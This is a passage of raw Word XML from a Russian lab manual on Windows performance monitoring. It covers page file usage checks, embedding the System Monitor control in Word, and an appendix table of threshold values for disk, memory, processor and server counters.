            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="3175"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67" cstate="print"/>
                    <a:srcRect l="53999" t="10612" r="43759" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="187325" cy="245110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, вставьте в отчет полученный график;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Проанализируйте полученные данные и сделайте вывод о необходимости увеличения размера файла подкачки: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если значение счетчика </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>% использования (пик)</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> достигает максимального размера файла подкачки или значение счетчика </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>% использования</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> близко к 100 процентам, попробуйте увеличить исходный размер файла подкачки. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вставьте элемент </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Системный монитор</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в документ Microsoft Word.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте документ Word и установите курсор там, где требуется вставить элемент. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выделите пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панели инструментов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем выберите команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Элементы управления</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Другие элементы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="237490" cy="295275"/>
            <wp:effectExtent l="1905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70" cstate="print"/>
                    <a:srcRect l="42392" t="24931" r="55090" b="70842"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="237490" cy="295275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">и выберите элемент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System Monitor Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Элемент управления системного монитора размещается в указанном месте документа. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">По умолчанию элемент находится в режиме конструктора. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выход из режима конструктора </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="259080" cy="259080"/>
            <wp:effectExtent l="19050" t="0" r="762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70" cstate="print"/>
                    <a:srcRect l="35907" t="6731" r="61378" b="89679"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="259080" cy="259080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Добавьте счетчики и настройки графика можно напечатать данные о производительности или сохранить документ, используя соответствующие команды Word. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ПРИЛОЖЕНИЕ №1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="determiningacceptablevalues"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение приемлемых значений для счетчиков</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">В общем случае приемлемый уровень производительности является субъективной оценкой, которая может сильно различаться в разных средах. Для сравнения рекомендуется использовать значение среднего уровня производительности, рассчитанное для данной организации. Следующая таблица, содержащая пороговые значения определенных счетчиков, поможет определить, имеются ли на данном компьютере элементы, ограничивающие его производительность. Если системный монитор постоянно возвращает указанные значения, значит, в работе системы имеются узкие места, и следует заняться настройкой или модернизацией соответствующих ресурсов. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9833" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1460"/>
        <w:gridCol w:w="2636"/>
        <w:gridCol w:w="1879"/>
        <w:gridCol w:w="3858"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidTr="00BD2CDB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1460" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ресурс</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2636" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Объект\Счетчик</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Рекомендуемое пороговое значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Comments</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Диск</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2636" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Физический диск\%свободного места </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Логический диск\% свободного места</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15%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pP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Диск</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2636" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Физический диск\% активности диска </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Логический диск\% активности диска</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90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pP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Диск</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Физический диск\Обращений чтения с диска/сек, Физический диск\Обращений записи на диск/сек</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Зависит от технических условий изготовителя</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 xml:space="preserve">Проверьте указанную скорость передачи дисков, чтобы проверить, соответствует ли она спецификациям. Обычно диски Ultra Wide SCSI могут выполнять от 50 до 70 операций ввода-вывода </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>в секунду.</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lastRenderedPageBreak/>
              <w:t>Диск</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Физический диск\Текущая длина очереди диска</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Количество осей вращения плюс 2</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Это счетчик мгновенных значений; возьмите несколько значений, полученных в разные моменты времени. Для наблюдения за средним значением воспользуйтесь счетчиком Физический диск\Средняя длина очереди диска.</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Память</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Память \ Доступно байт</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Меньше 4 Мбайт</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Проследите за использованием памяти и увеличьте ее объем, если требуется.</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Память</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Память \ Обмен страниц в сек</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20</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Проследите за активностью процесса подкачки страниц памяти.</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Файл подкачки</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Файл подкачки \ % использования</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Больше 70%</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Чтобы получить представление об обмене страниц на компьютере, проследите за этим значением совместно со значениями счетчиков «Доступно байт» и «Обмен страниц в сек».</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Процессор  </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Процессор \% загруженности процессора</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85%</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Найдите процесс, использующий наибольшую долю процессорного времени. Замените процессор на более быстрый или установите дополнительный процессор.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidTr="00BD2CDB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1460" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="00BD2CDB">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Процессор</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 xml:space="preserve">Процессор \ Прерываний/сек </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Зависит от процессора; подходящее начальное значение – 1000 прерываний в секунду</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Значительное увеличение значения этого счетчика без соответствующего увеличения активности системы указывает на наличие неполадки. Определите, какая сетевая плата отправляет эти прерывания. Возможно, потребуется установить дополнительную плату или контроллер.</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Сервер</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Сервер \ Всего байт/сек</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pP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Если сумма значений счетчиков «Всего байт/сек» для всех серверов приближается к максимальной скорости передачи данных по сети, возможно, следует разделить сеть на сегменты.</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Сервер</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Сервер \ Нехватка рабочих элементов</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3</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 xml:space="preserve">Если значение счетчика достигает указанного порога, попробуйте добавить записи (типа DWORD) </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
